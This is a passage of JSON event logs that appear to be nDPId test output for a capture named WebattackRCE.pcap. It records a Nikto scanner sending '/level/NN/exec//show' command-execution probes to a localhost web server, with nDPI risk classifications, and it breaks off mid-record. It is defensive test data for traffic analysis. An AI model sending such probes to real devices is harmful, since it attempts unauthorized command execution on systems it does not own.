00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":574,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":574,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277597,"flow_last_seen":1576420277597,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277597,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50710,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":574,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":574,"flow_packet_id":1,"flow_last_seen":1576420277597,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277597,"pkt":"AAAAAAAAAAAAAAAACABFAADI4QFAAEAGWyx\/AAABfwAAAcYWH5APltgJOmv38YAYAED+vAAAAQEICp1m\/oSdZv6ER0VUIC9sZXZlbC8yNi9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjczKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01066{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":574,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":574,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277597,"flow_last_seen":1576420277597,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277597,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50710,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/26\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001273)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":575,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":575,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277598,"flow_last_seen":1576420277598,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277598,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50712,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":575,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":575,"flow_packet_id":1,"flow_last_seen":1576420277598,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277598,"pkt":"AAAAAAAAAAAAAAAACABFAADIuK1AAEAGg4B\/AAABfwAAAcYYH5AkxYBd7ezrAoAYAED+vAAAAQEICp1m\/oadZv6GR0VUIC9sZXZlbC8yNy9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyNzQpDQoNCg=="}
01066{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":575,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":575,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277598,"flow_last_seen":1576420277598,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277598,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50712,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/27\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001274)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":576,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":576,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277600,"flow_last_seen":1576420277600,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277600,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50714,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":576,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":576,"flow_packet_id":1,"flow_last_seen":1576420277600,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277600,"pkt":"AAAAAAAAAAAAAAAACABFAADIQiNAAEAG+gp\/AAABfwAAAcYaH5DTCnrawy0BcYAYAED+vAAAAQEICp1m\/oidZv6IR0VUIC9sZXZlbC8yOC9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjc1KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01066{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":576,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":576,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277600,"flow_last_seen":1576420277600,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277600,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50714,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/28\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001275)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":577,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":577,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277602,"flow_last_seen":1576420277602,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277602,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50716,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":577,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":577,"flow_packet_id":1,"flow_last_seen":1576420277602,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277602,"pkt":"AAAAAAAAAAAAAAAACABFAADIalZAAEAG0dd\/AAABfwAAAcYcH5BVA1KtKWKiFYAYAED+vAAAAQEICp1m\/oqdZv6JR0VUIC9sZXZlbC8yOS9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjc2KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01066{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":577,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":577,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277602,"flow_last_seen":1576420277602,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277602,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50716,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/29\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001276)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":578,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":578,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277604,"flow_last_seen":1576420277604,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277604,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50718,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":578,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":578,"flow_packet_id":1,"flow_last_seen":1576420277604,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277604,"pkt":"AAAAAAAAAAAAAAAACABFAADIeUZAAEAGwud\/AAABfwAAAcYeH5Dj\/UG+lxmHS4AYAED+vAAAAQEICp1m\/oudZv6LR0VUIC9sZXZlbC8zMC9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyNzcpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
01066{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":578,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":578,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277604,"flow_last_seen":1576420277604,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277604,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50718,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/30\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001277)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":579,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":579,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277607,"flow_last_seen":1576420277607,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277607,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50720,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":579,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":579,"flow_packet_id":1,"flow_last_seen":1576420277607,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277607,"pkt":"AAAAAAAAAAAAAAAACABFAADISctAAEAG8mJ\/AAABfwAAAcYgH5D3W3ExGI1+2IAYAED+vAAAAQEICp1m\/o6dZv6OR0VUIC9sZXZlbC8zMS9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyNzgpDQoNCg=="}
01066{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":579,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":579,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277607,"flow_last_seen":1576420277607,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277607,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50720,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/31\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001278)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":580,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":580,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277608,"flow_last_seen":1576420277608,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277608,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50722,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":580,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":580,"flow_packet_id":1,"flow_last_seen":1576420277608,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277608,"pkt":"AAAAAAAAAAAAAAAACABFAADIARxAAEAGOxJ\/AAABfwAAAcYiH5DcsTnhkT\/ypIAYAED+vAAAAQEICp1m\/pCdZv6QR0VUIC9sZXZlbC8zMi9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjc5KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01066{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":580,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":580,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277608,"flow_last_seen":1576420277608,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277608,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50722,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/32\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001279)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":581,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":581,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277609,"flow_last_seen":1576420277609,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277609,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50724,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":581,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":581,"flow_packet_id":1,"flow_last_seen":1576420277609,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277609,"pkt":"AAAAAAAAAAAAAAAACABFAADIVW1AAEAG5sB\/AAABfwAAAcYkH5Dpym2S0+8SfoAYAED+vAAAAQEICp1m\/pGdZv6RR0VUIC9sZXZlbC8zMy9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjgwKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01066{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":581,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":581,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277609,"flow_last_seen":1576420277609,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277609,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50724,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/33\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001280)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":582,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":582,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277611,"flow_last_seen":1576420277611,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277611,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50726,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":582,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":582,"flow_packet_id":1,"flow_last_seen":1576420277611,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277611,"pkt":"AAAAAAAAAAAAAAAACABFAADIEPFAAEAGKz1\/AAABfwAAAcYmH5CKoygWHO02yYAYAED+vAAAAQEICp1m\/pOdZv6TR0VUIC9sZXZlbC8zNC9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyODEpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
01066{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":582,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":582,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277611,"flow_last_seen":1576420277611,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277611,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50726,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/34\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001281)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":583,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":583,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277612,"flow_last_seen":1576420277612,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277612,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50728,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":583,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":583,"flow_packet_id":1,"flow_last_seen":1576420277612,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277612,"pkt":"AAAAAAAAAAAAAAAACABFAADILGdAAEAGD8d\/AAABfwAAAcYoH5DpvhSfS8jZeYAYAED+vAAAAQEICp1m\/pSdZv6UR0VUIC9sZXZlbC8zNS9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyODIpDQoNCg=="}
01066{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":583,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":583,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277612,"flow_last_seen":1576420277612,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277612,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50728,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/35\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001282)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":584,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":584,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277614,"flow_last_seen":1576420277614,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277614,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50730,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":584,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":584,"flow_packet_id":1,"flow_last_seen":1576420277614,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277614,"pkt":"AAAAAAAAAAAAAAAACABFAADIgnNAAEAGubp\/AAABfwAAAcYqH5AJ3LqL6hJPloAYAED+vAAAAQEICp1m\/pWdZv6VR0VUIC9sZXZlbC8zNi9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyODMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
01066{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":584,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":584,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277614,"flow_last_seen":1576420277614,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277614,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50730,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 